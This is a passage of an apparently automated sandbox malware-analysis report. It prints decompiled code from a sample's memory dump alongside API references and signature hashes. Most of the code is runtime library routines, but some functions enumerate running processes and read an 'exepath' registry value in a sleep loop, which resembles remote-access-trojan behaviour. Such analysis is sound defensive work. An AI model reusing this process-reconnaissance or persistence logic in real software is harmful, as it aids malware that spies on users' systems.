                																						 *((intOrPtr*)(_t432 + 0x28 + (_t364 + _t364) * 8)) = _t397;
                																					} else {
                																						 *(_v724 + _t432) = _t396;
                																						_t205 = _t364 * 4; // 0xcea3
                																						E00445002( *((intOrPtr*)(_t432 + _t205 + 0xa0)));
                																						 *(_t432 + 0xa0 + _t364 * 4) = _v744;
                																						E00445002(_v740);
                																						 *(_t432 + 8) = _v748;
                																						goto L84;
                																					}
                																					goto L85;
                																				}
                																			}
                																		} else {
                																			goto L85;
                																		}
                																		goto L130;
                																	}
                																	asm("sbb eax, eax");
                																	_t282 = _t281 | 0x00000001;
                																	__eflags = _t282;
                																	goto L93;
                																} else {
                																	L84:
                																	__eflags = 0;
                																	L85:
                																	__eflags = _v16 ^ _t465;
                																	return E004338BB(_v16 ^ _t465);
                																}
                															} else {
                																_t330 = _t447 + _t447;
                																__eflags = _t330 - 0x106;
                																if(_t330 >= 0x106) {
                																	E004339EF();
                																	goto L82;
                																} else {
                																	 *((short*)(_t463 + _t330 - 0x10c)) = 0;
                																	_t332 =  &_v276;
                																	_push(_t332);
                																	_push(_v460);
                																	_push(_t428);
                																	L83();
                																	_t472 = _t475 + 0xc;
                																	__eflags = _t332;
                																	_t268 = _v452;
                																	if(_t332 != 0) {
                																		_t268 = _t268 + 1;
                																		_v452 = _t268;
                																	}
                																	L54:
                																	_t444 = _t359 + _t447 * 2;
                																	_t370 = 0;
                																	__eflags =  *_t444;
                																	if( *_t444 == 0) {
                																		L56:
                																		__eflags = _t268;
                																		L77:
                																		if(__eflags != 0) {
                																			goto L79;
                																		} else {
                																		}
                																		goto L80;
                																	} else {
                																		_t444 = _t444 + 2;
                																		__eflags =  *_t444;
                																		if( *_t444 != 0) {
                																			continue;
                																		} else {
                																			goto L56;
                																		}
                																	}
                																}
                															}
                														}
                													} else {
                														_t333 = 0x3b;
                														__eflags =  *_t359 - _t333;
                														if( *_t359 != _t333) {
                															break;
                														} else {
                															goto L48;
                														}
                													}
                												}
                											}
                											goto L130;
                										}
                										goto L80;
                									}
                								}
                							}
                						}
                					} else {
                						__eflags = _t444;
                						if(_t444 != 0) {
                							_push(_t444);
                							_push(_t249);
                							_push(_t428);
                							L83();
                						}
                						L80:
                						__eflags = _v12 ^ _t463;
                						return E004338BB(_v12 ^ _t463);
                					}
                				}
                				L130:
                			}
                0x00443cd4
                0x00443ced
                0x00443cf2
                0x00443cf5
                0x00443cf7
                0x00443cfd
                0x00443d38
                0x00443cff
                0x00443cff
                0x00443d04
                0x00443d0c
                0x00443d0d
                0x00443d0d
                0x00443d24
                0x00443d2b
                0x00443d2e
                0x00443d33
                0x00443d33
                0x00443d3b
                0x00443d3e
                0x00443d3e
                0x00443d43
                0x00000000
                0x00443d43
                0x00443caa
                0x00443cac
                0x00443cb1
                0x00443cb7
                0x00443cc0
                0x00443cc9
                0x00443cc9
                0x00000000
                0x00443cac
                0x00443d66
                0x00443d66
                0x00443d6a
                0x00443d72
                0x00443d78
                0x00443d7b
                0x00443d81
                0x00443d83
                0x00443dc3
                0x00443dc9
                0x00443dd0
                0x00443dd0
                0x00443dd6
                0x00443dda
                0x00000000
                0x00443ddc
                0x00443ddc
                0x00443de0
                0x00443de5
                0x00443de9
                0x00443dee
                0x00443df5
                0x00443e03
                0x00443e09
                0x00443e0c
                0x00443e0c
                0x00443dda
                0x00443e1b
                0x00443e23
                0x00443e2c
                0x00443d85
                0x00443d8b
                0x00443d8e
                0x00443d95
                0x00443da7
                0x00443dae
                0x00443dbb
                0x00000000
                0x00443dbb
                0x00000000
                0x00443d83
                0x00443bdc
                0x00443b57
                0x00000000
                0x00443b57
                0x00000000
                0x00443b55
                0x00443b4e
                0x00443b50
                0x00443b50
                0x00000000
                0x00443ada
                0x00443ada
                0x00443ada
                0x00443adc
                0x00443ae1
                0x00443aec
                0x00443aec
                0x00443903
                0x00443903
                0x00443906
                0x0044390b
                0x00443a68
                0x00000000
                0x00443911
                0x00443913
                0x0044391b
                0x00443921
                0x00443922
                0x00443928
                0x00443929
                0x0044392e
                0x00443931
                0x00443933
                0x00443939
                0x0044393b
                0x0044393c
                0x0044393c
                0x0044394a
                0x0044394a
                0x0044394d
                0x0044394f
                0x00443952
                0x00443960
                0x00443960
                0x00443a4a
                0x00443a4a
                0x00000000
                0x00443a4c
                0x00443a4c
                0x00000000
                0x00443954
                0x00443954
                0x00443957
                0x0044395a
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0044395a
                0x00443952
                0x0044390b
                0x004438fd
                0x004438d0
                0x004438d2
                0x004438d3
                0x004438d6
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004438d6
                0x004438ce
                0x00443856
                0x00000000
                0x0044384a
                0x00000000
                0x00443967
                0x0044381d
                0x00443812
                0x00443807
                0x004437c0
                0x004437c0
                0x004437c2
                0x004437c4
                0x004437c5
                0x004437c6
                0x004437c7
                0x004437cc
                0x00443a57
                0x00443a5c
                0x00443a67
                0x00443a67
                0x004437be
                0x00000000

                APIs
                  • Part of subcall function 00444A38: RtlAllocateHeap.NTDLL(00000000,00433B6F,?,P@,00437117,?,?,00000000,?,P@,0040D366,00433B6F,?,?,?,?), ref: 00444A6A
                • _free.LIBCMT ref: 00443707
                • _free.LIBCMT ref: 0044371E
                • _free.LIBCMT ref: 0044373D
                • _free.LIBCMT ref: 00443758
                • _free.LIBCMT ref: 0044376F
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: _free$AllocateHeap
                • String ID:
                • API String ID: 3033488037-0
                • Opcode ID: b6cc103d42dec73caba0faed39fcbb1d6259d76fbcf985581e3157810f6f44a6
                • Instruction ID: 33fd527e9c34fc99befeee23a18cff77bba5ae58738d28a8d8759c9d181ac574
                • Opcode Fuzzy Hash: b6cc103d42dec73caba0faed39fcbb1d6259d76fbcf985581e3157810f6f44a6
                • Instruction Fuzzy Hash: 1F51F6B1A00705AFEB20DF2AC841A6AB7F4EF45B25F14416FE849D7351E739DA01CB88
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 69%
                			E00447BE5(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                				int _v8;
                				int _v12;
                				int _v16;
                				int _v20;
                				signed int _v56;
                				char _v268;
                				intOrPtr _v272;
                				char _v276;
                				char _v312;
                				char _v316;
                				void* __ebp;
                				void* _t36;
                				signed int _t38;
                				signed int _t42;
                				signed int _t50;
                				void* _t54;
                				void* _t56;
                				signed int* _t61;
                				intOrPtr _t71;
                				void* _t78;
                				signed int _t85;
                				signed int _t87;
                				signed int _t89;
                				int _t93;
                				char** _t96;
                				signed int _t100;
                				signed int _t101;
                				signed int _t106;
                				signed int _t107;
                				intOrPtr _t116;
                				intOrPtr _t118;
                
                				_t88 = __edi;
                				_t96 = E0044764F();
                				_v8 = 0;
                				_v12 = 0;
                				_v16 = 0;
                				_t36 = E004476AD( &_v8);
                				_pop(_t78);
                				if(_t36 != 0) {
                					L19:
                					_push(0);
                					_push(0);
                					_push(0);
                					_push(0);
                					_push(0);
                					E0043A5E8();
                					asm("int3");
                					_t106 = _t107;
                					_t38 =  *0x46f00c; // 0xd60a1515
                					_v56 = _t38 ^ _t106;
                					 *0x46f344 =  *0x46f344 | 0xffffffff;
                					 *0x46f338 =  *0x46f338 | 0xffffffff;
                					_push(0);
                					_push(_t96);
                					_t77 = "TZ";
                					_t89 = 0;
                					 *0x470758 = 0;
                					_t42 = E0043A9B5(__eflags,  &_v316,  &_v312, 0x100, "TZ");
                					__eflags = _t42;
                					if(_t42 != 0) {
                						__eflags = _t42 - 0x22;
                						if(_t42 == 0x22) {
                							_t101 = E00444A38(_t78, _v272);
                							__eflags = _t101;
                							if(__eflags != 0) {
                								_t50 = E0043A9B5(__eflags,  &_v276, _t101, _v272, _t77);
                								__eflags = _t50;
                								if(_t50 == 0) {
                									E00445002(0);
                									_t89 = _t101;
                								} else {
                									_push(_t101);
                									goto L25;
                								}
                							} else {
                								_push(0);
                								L25:
                								E00445002();
                							}
                						}
                					} else {
                						_t89 =  &_v268;
                					}
                					asm("sbb esi, esi");
                					_t100 =  ~(_t89 -  &_v268) & _t89;
                					__eflags = _t89;
                					if(__eflags == 0) {
                						L33:
                						E00447BE5(_t77, _t89, _t100, __eflags);
                					} else {
                						__eflags =  *_t89;
                						if(__eflags == 0) {
                							goto L33;
                						} else {
                							_push(_t89);
                							E00447A10(_t77, _t89, _t100, __eflags);
                						}
                					}
                					E00445002(_t100);
                					__eflags = _v12 ^ _t106;
                					return E004338BB(_v12 ^ _t106);
                				} else {
                					_t54 = E00447655( &_v12);
                					_pop(_t78);
                					if(_t54 != 0) {
                						goto L19;
                					} else {
                						_t56 = E00447681( &_v16);
                						_pop(_t78);
                						if(_t56 != 0) {
                							goto L19;
                						} else {
                							E00445002( *0x470750);
                							 *0x470750 = 0;
                							 *_t107 = 0x470760;
                							if(GetTimeZoneInformation(??) != 0xffffffff) {
                								_t85 =  *0x470760 * 0x3c;
                								_t87 =  *0x4707b4; // 0x0
                								_push(__edi);
                								 *0x470758 = 1;
                								_v8 = _t85;
                								_t116 =  *0x4707a6; // 0x0
                								if(_t116 != 0) {
                									_v8 = _t85 + _t87 * 0x3c;
                								}
                								_t118 =  *0x4707fa; // 0x0
                								if(_t118 == 0) {
                									L9:
                									_v12 = 0;
                									_v16 = 0;
                								} else {
                									_t71 =  *0x470808; // 0x0
                									if(_t71 == 0) {
                										goto L9;
                									} else {
                										_v12 = 1;
                										_v16 = (_t71 - _t87) * 0x3c;
                									}
                								}
                								_t93 = E00444607(0, _t87);
                								if(WideCharToMultiByte(_t93, 0, 0x470764, 0xffffffff,  *_t96, 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
                									 *( *_t96) = 0;
                								} else {
                									( *_t96)[0x3f] = 0;
                								}
                								if(WideCharToMultiByte(_t93, 0, 0x4707b8, 0xffffffff, _t96[1], 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
                									 *(_t96[1]) = 0;
                								} else {
                									_t96[1][0x3f] = 0;
                								}
                							}
                							 *(E00447649()) = _v8;
                							 *(E0044763D()) = _v12;
                							_t61 = E00447643();
                							 *_t61 = _v16;
                							return _t61;
                						}
                					}
                				}
                			}

                APIs
                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D204), ref: 00447C4F
                • WideCharToMultiByte.KERNEL32(00000000,00000000,00470764,000000FF,00000000,0000003F,00000000,?,?), ref: 00447CC7
                • WideCharToMultiByte.KERNEL32(00000000,00000000,004707B8,000000FF,?,0000003F,00000000,?), ref: 00447CF4
                • _free.LIBCMT ref: 00447C3D
                  • Part of subcall function 00445002: HeapFree.KERNEL32(00000000,00000000,?,0044F4EF,?,00000000,?,00000000,?,0044F793,?,00000007,?,?,0044FCDE,?), ref: 00445018
                  • Part of subcall function 00445002: GetLastError.KERNEL32(?,?,0044F4EF,?,00000000,?,00000000,?,0044F793,?,00000007,?,?,0044FCDE,?,?), ref: 0044502A
                • _free.LIBCMT ref: 00447E09
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                • String ID:
                • API String ID: 1286116820-0
                • Opcode ID: 192cb104f115433a19df37c8a32fadc6d02125d47b70fccf30c1571d909818d4
                • Instruction ID: b174790296e1c1cb64190fb610b95ef3deb4325f3671f118df16a2f4d1cf92b6
                • Opcode Fuzzy Hash: 192cb104f115433a19df37c8a32fadc6d02125d47b70fccf30c1571d909818d4
                • Instruction Fuzzy Hash: 97511871D04209EBEB14EF79DC819AA77B8EF40324F11026FE455E3291E7389D428B9C
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 96%
                			E0040EE40(void* __ebx, void* __ecx, void* __edx, void* __eflags) {
                				char _v540;
                				char _v568;
                				void* _v572;
                				void* _v584;
                				char _v604;
                				void* _v608;
                				char _v628;
                				void* _v632;
                				char _v652;
                				void* _v656;
                				char _v676;
                				void* _v680;
                				char _v700;
                				void* _v704;
                				char _v724;
                				void* _v728;
                				char _v748;
                				void* _v752;
                				char _v772;
                				void* _v776;
                				char _v796;
                				void* _v800;
                				char _v820;
                				void* _v824;
                				char _v844;
                				void* _v848;
                				char _v868;
                				void* _v872;
                				char _v892;
                				void* _v896;
                				char _v912;
                				char _v916;
                				void* _v920;
                				void* __edi;
                				void* __esi;
                				void* __ebp;
                				int _t45;
                				void* _t50;
                				void* _t51;
                				void* _t53;
                				void* _t133;
                				void* _t134;
                
                				_t120 = __edx;
                				_t81 = __ecx;
                				_t80 = __ebx;
                				_t133 = __ecx;
                				E004020BF(__ebx, __ecx);
                				 *0x472ae4 = E0041AB12(_t81);
                				_t134 = CreateToolhelp32Snapshot(2, 0);
                				if(_t134 != 0) {
                					_v568 = 0x22c;
                					_push( &_v568);
                					Process32FirstW(_t134);
                					_t45 = Process32NextW(_t134,  &_v572);
                					_t138 = _t45;
                					if(_t45 != 0) {
                						do {
                							E0040415E(__ebx,  &_v912, _t120, 0x465488,  &_v540);
                							_t50 = E0041A6E9(_t80,  &_v604, E0041AB40(_v572) & 0x000000ff);
                							_t51 = E0041A6E9(_t80,  &_v628, _v572);
                							_t53 = E0041A879(_t80,  &_v676, E0041AB76( &_v652, _v572));
                							_t120 = E00402E81( &_v868, E00408832(_t80,  &_v844, E00402E81( &_v820, E00408832(_t80,  &_v796, E00402E81( &_v772, E00408832(_t80,  &_v748, E004087CF(_t80,  &_v724, _t133, 0x465488, _t138, E0041A879(_t80,  &_v700,  &_v916)), _t133, 0x465488, _t138, 0x465488), _t53), _t133, 0x465488, _t138, 0x465488), _t51), _t133, 0x465488, _t138, 0x465488), _t50);
                							E00401FC2(_t133, _t61, _t134, E00408832(_t80,  &_v892, _t61, _t133, 0x465488, _t138, "|"));
                							E00401FB8();
                							E00401FB8();
                							E00401FB8();
                							E00401FB8();
                							E00401FB8();
                							E00401FB8();
                							E00401FB8();
                							E00401FB8();
                							E00401FB8();
                							E00401FB8();
                							E00401EE9();
                							E00401FB8();
                							E00401FB8();
                							E00401EE9();
                						} while (Process32NextW(_t134,  &_v584) != 0);
                					}
                					CloseHandle(_t134);
                				}
                				return _t133;
                			}

                APIs
                  • Part of subcall function 0041AB12: GetCurrentProcess.KERNEL32(?,?,?,0040CFAE,WinDir,00000000,00000000), ref: 0041AB23
                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040EE5E
                • Process32FirstW.KERNEL32(00000000,?), ref: 0040EE82
                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040EE91
                • CloseHandle.KERNEL32(00000000), ref: 0040F048
                  • Part of subcall function 0041AB40: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040EB16,00000000,?,?,00473280), ref: 0041AB55
                  • Part of subcall function 0041AB76: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 0041AB8B
                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F039
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ProcessProcess32$NextOpen$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                • String ID:
                • API String ID: 1735047541-0
                • Opcode ID: 9a99e7b29474ea2fafdff9d0398a0b8897655f81ffde536f2fed65fdb5951a3c
                • Instruction ID: fc5c85540f889f3a2ab1a6016a9079e2269e38591cc5ac43cbc88825ef87a1e7
                • Opcode Fuzzy Hash: 9a99e7b29474ea2fafdff9d0398a0b8897655f81ffde536f2fed65fdb5951a3c
                • Instruction Fuzzy Hash: CD4142311082415BC324F761DC91AEFB3E9AFD4344F50493EF48A921E2EF38A94AC65A
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 83%
                			E00442719(signed int* __ecx, signed int __edx) {
                				signed int _v8;
                				intOrPtr* _v12;
                				signed int _v16;
                				signed int _t28;
                				signed int _t29;
                				intOrPtr _t33;
                				signed int _t37;
                				signed int _t38;
                				signed int _t40;
                				void* _t50;
                				signed int _t56;
                				intOrPtr* _t57;
                				signed int _t68;
                				signed int _t71;
                				signed int _t72;
                				signed int _t74;
                				signed int _t75;
                				signed int _t78;
                				signed int _t80;
                				signed int* _t81;
                				signed int _t85;
                				void* _t86;
                
                				_t72 = __edx;
                				_v12 = __ecx;
                				_t28 =  *__ecx;
                				_t81 =  *_t28;
                				if(_t81 != 0) {
                					_t29 =  *0x46f00c; // 0xd60a1515
                					_t56 =  *_t81 ^ _t29;
                					_t78 = _t81[1] ^ _t29;
                					_t83 = _t81[2] ^ _t29;
                					asm("ror edi, cl");
                					asm("ror esi, cl");
                					asm("ror ebx, cl");
                					if(_t78 != _t83) {
                						L14:
                						 *_t78 = E004425DA( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
                						_t33 = E00432C79(_t56);
                						_t57 = _v12;
                						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
                						_t24 = _t78 + 4; // 0x4
                						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E00432C79(_t24);
                						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E00432C79(_t83);
                						_t37 = 0;
                						L15:
                						return _t37;
                					}
                					_t38 = 0x200;
                					_t85 = _t83 - _t56 >> 2;
                					if(_t85 <= 0x200) {
                						_t38 = _t85;
                					}
                					_t80 = _t38 + _t85;
                					if(_t80 == 0) {
                						_t80 = 0x20;
                					}
                					if(_t80 < _t85) {
                						L9:
                						_push(4);
                						_t80 = _t85 + 4;
                						_push(_t80);
                						_v8 = E0044E355(_t56);
                						_t40 = E00445002(0);
                						_t68 = _v8;
                						_t86 = _t86 + 0x10;
                						if(_t68 != 0) {
                							goto L11;
                						}
                						_t37 = _t40 | 0xffffffff;
                						goto L15;
                					} else {
                						_push(4);
                						_push(_t80);
                						_v8 = E0044E355(_t56);
                						E00445002(0);
                						_t68 = _v8;
                						_t86 = _t86 + 0x10;
                						if(_t68 != 0) {
                							L11:
                							_t56 = _t68;
                							_v8 = _t68 + _t85 * 4;
                							_t83 = _t68 + _t80 * 4;
                							_t78 = _v8;
                							_push(0x20);
                							asm("ror eax, cl");
                							_t71 = _t78;
                							_v16 = 0 ^  *0x46f00c;
                							asm("sbb edx, edx");
                							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
                							_v8 = _t74;
                							if(_t74 == 0) {
                								goto L14;
                							}
                							_t75 = _v16;
                							_t50 = 0;
                							do {
                								_t50 = _t50 + 1;
                								 *_t71 = _t75;
                								_t71 = _t71 + 4;
                							} while (_t50 != _v8);
                							goto L14;
                						}
                						goto L9;
                					}
                				}
                				return _t28 | 0xffffffff;
                			}

                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: _free
                • String ID:
                • API String ID: 269201875-0
                • Opcode ID: c116326db574ec4ac976eebbd44619f729e5691f91e73ba179bd56b8a01ad2b5
                • Instruction ID: 2285a7be470c23e98719e3e167ac4dd42b0d3d2551702f58938e7795a41d704d
                • Opcode Fuzzy Hash: c116326db574ec4ac976eebbd44619f729e5691f91e73ba179bd56b8a01ad2b5
                • Instruction Fuzzy Hash: E941F332E002009FEB10DF79C981A5EB3B5EF89714F5581AEE915EB381DBB5AD01CB84
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 81%
                			E0044F9AC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
                				signed int _v8;
                				int _v12;
                				char _v16;
                				intOrPtr _v24;
                				char _v28;
                				void* _v40;
                				signed int _t34;
                				signed int _t40;
                				int _t46;
                				int _t53;
                				void* _t55;
                				int _t57;
                				signed int _t63;
                				int _t67;
                				short* _t69;
                				signed int _t70;
                				short* _t71;
                
                				_t34 =  *0x46f00c; // 0xd60a1515
                				_v8 = _t34 ^ _t70;
                				E004390B7(__ebx,  &_v28, __edx, _a4);
                				_t57 = _a24;
                				if(_t57 == 0) {
                					_t53 =  *(_v24 + 8);
                					_t57 = _t53;
                					_a24 = _t53;
                				}
                				_t67 = 0;
                				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
                				_v12 = _t40;
                				if(_t40 == 0) {
                					L15:
                					if(_v16 != 0) {
                						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
                					}
                					return E004338BB(_v8 ^ _t70);
                				}
                				_t55 = _t40 + _t40;
                				asm("sbb eax, eax");
                				if((_t55 + 0x00000008 & _t40) == 0) {
                					_t69 = 0;
                					L11:
                					if(_t69 != 0) {
                						E00435760(_t67, _t69, _t67, _t55);
                						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
                						if(_t46 != 0) {
                							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
                						}
                					}
                					L14:
                					E00434713(_t69);
                					goto L15;
                				}
                				asm("sbb eax, eax");
                				_t48 = _t40 & _t55 + 0x00000008;
                				_t63 = _t55 + 8;
                				if((_t40 & _t55 + 0x00000008) > 0x400) {
                					asm("sbb eax, eax");
                					_t69 = E00444A38(_t63, _t48 & _t63);
                					if(_t69 == 0) {
                						goto L14;
                					}
                					 *_t69 = 0xdddd;
                					L9:
                					_t69 =  &(_t69[4]);
                					goto L11;
                				}
                				asm("sbb eax, eax");
                				E00455A90();
                				_t69 = _t71;
                				if(_t69 == 0) {
                					goto L14;
                				}
                				 *_t69 = 0xcccc;
                				goto L9;
                			}

                APIs
                • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042C60C,?,?,?,00000001,00000000,?,00000001,0042C60C,0042C60C), ref: 0044F9F9
                • __alloca_probe_16.LIBCMT ref: 0044FA31
                • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042C60C,?,?,?,00000001,00000000,?,00000001,0042C60C,0042C60C,?), ref: 0044FA82
                • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042C60C,0042C60C,?,00000002,00000000), ref: 0044FA94
                • __freea.LIBCMT ref: 0044FA9D
                  • Part of subcall function 00444A38: RtlAllocateHeap.NTDLL(00000000,00433B6F,?,P@,00437117,?,?,00000000,?,P@,0040D366,00433B6F,?,?,?,?), ref: 00444A6A
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                • String ID:
                • API String ID: 313313983-0
                • Opcode ID: a135343eee6ef5a04005f02c8804c8feac57652aa70f0817bf27bbd7988de7b5
                • Instruction ID: c39bf728e7cf4935227f6dd7d506cca849d0501c7d5e8428f05d5abeab6cc89e
                • Opcode Fuzzy Hash: a135343eee6ef5a04005f02c8804c8feac57652aa70f0817bf27bbd7988de7b5
                • Instruction Fuzzy Hash: 2631E372A0020AABEF249F65DC41DAF7BA5EB40314F04057AFC08E7251E739DD59CB94
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 90%
                			E00411C1E(void* __eflags) {
                				char _v524;
                				void* __ebx;
                				void* __edi;
                				void* _t6;
                				void* _t7;
                				void* _t8;
                				signed int _t9;
                				void* _t11;
                				char _t16;
                				void* _t19;
                				void* _t20;
                				void* _t23;
                				void* _t31;
                				signed int _t55;
                				void* _t57;
                
                				_t57 = (_t55 & 0xfffffff8) - 0x208;
                				_t31 = 0x473220;
                				_t6 = E00406E3A(0x46a8f0);
                				_t53 = "exepath";
                				if(_t6 == 0) {
                					goto L8;
                				} else {
                					E00435760(0x46a8f0,  &_v524, 0, 0x208);
                					_t19 = E0040245C();
                					_t20 = E00401F8B(0x473280);
                					_t44 = E00401F8B(0x473238);
                					_t23 = E004129E0(_t22, "exepath",  &_v524, 0x410, _t20, _t19);
                					_t57 = _t57 + 0x20;
                					if(_t23 != 0) {
                						L004086CB(0x473280, 0x473220, _t44,  &_v524);
                					}
                					_t31 = 0x473220;
                					if(E00406E3A(0x46a8f0) == 0) {
                						while(1) {
                							L8:
                							__eflags =  *0x470d60;
                							if( *0x470d60 == 0) {
                								break;
                							}
                							Sleep(0xbb8);
                							__eflags =  *0x470b32;
                							if( *0x470b32 != 0) {
                								_push(E00401EE4(0x473208));
                								E0040C21B(0x473208);
                								_pop(_t31);
                							}
                							_push(_t31);
                							_t7 = E0040245C();
                							_t8 = E00401F8B(0x473280);
                							_t9 = E0040245C();
                							_t11 = E00401EE4(0x473220);
                							_t31 = 0x473238;
                							E00412C2F(E00401F8B(0x473238), __eflags, _t53, _t11, 2 + _t9 * 2, _t8, _t7);
                							_t57 = _t57 + 0x18;
                						}
                						_t16 = 0;
                						__eflags = 0;
                					} else {
                						_t16 = 1;
                					}
                				}
                				return _t16;
                			}

                APIs
                  • Part of subcall function 004129E0: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,00473238), ref: 004129FC
                  • Part of subcall function 004129E0: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412A15
                  • Part of subcall function 004129E0: RegCloseKey.ADVAPI32(00000000), ref: 00412A20
                • Sleep.KERNEL32(00000BB8), ref: 00411CBD
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CloseOpenQuerySleepValue
                • String ID: 2G$82G$82G$exepath
                • API String ID: 4119054056-3664068176
                • Opcode ID: dce137320b54f542d7e81c6f206edef1d765319c2fd189bc890e2f0ca8d35697
                • Instruction ID: 1bc3c23f432ba4f57a41c102a15aec319e0c21ae64d144f38269a80ff3ae14c8
                • Opcode Fuzzy Hash: dce137320b54f542d7e81c6f206edef1d765319c2fd189bc890e2f0ca8d35697
                • Instruction Fuzzy Hash: 5021F4A0B0030427D600B76A6C46ABF228E8B80308F00497FB946E72D3EF3C9D4641AE
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 93%
                			E0044DBDA() {
                				int _v8;
                				void* __ecx;
                				void* _t6;
                				int _t7;
                				char* _t13;
                				int _t17;
                				void* _t19;
                				char* _t25;
                				WCHAR* _t27;
                
                				_t27 = GetEnvironmentStringsW();
                				if(_t27 == 0) {
                					L7:
                					_t13 = 0;
                				} else {
                					_t6 = E0044DBA3(_t27);
                					_pop(_t19);
                					_t17 = _t6 - _t27 >> 1;
                					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
                					_v8 = _t7;
                					if(_t7 == 0) {
                						goto L7;
                					} else {
                						_t25 = E00444A38(_t19, _t7);
                						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
                							_t13 = 0;
                						} else {
                							_t13 = _t25;
                							_t25 = 0;
                						}
                						E00445002(_t25);
                					}
                				}
                				if(_t27 != 0) {
                					FreeEnvironmentStringsW(_t27);
                				}
                				return _t13;
                			}

                APIs
                • GetEnvironmentStringsW.KERNEL32 ref: 0044DBE3
                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044DC06
                  • Part of subcall function 00444A38: RtlAllocateHeap.NTDLL(00000000,00433B6F,?,P@,00437117,?,?,00000000,?,P@,0040D366,00433B6F,?,?,?,?), ref: 00444A6A
                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044DC2C
                • _free.LIBCMT ref: 0044DC3F
                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044DC4E
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                • String ID:
                • API String ID: 336800556-0
                • Opcode ID: 10270a1cb6cb36a8ff3114673be7265c51b3b850fc2d116722adec396266e159
                • Instruction ID: d30a67c417177e80d80b31b0a31e6726aa7580f18a7a9fd153e391297dd7151b
                • Opcode Fuzzy Hash: 10270a1cb6cb36a8ff3114673be7265c51b3b850fc2d116722adec396266e159
                • Instruction Fuzzy Hash: 38017172A057157F37211AA66D89C7F7A6DDAC2B65315017EF904D2341DEA88C02C1B9
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 82%
                			E00446B19(void* __ecx) {
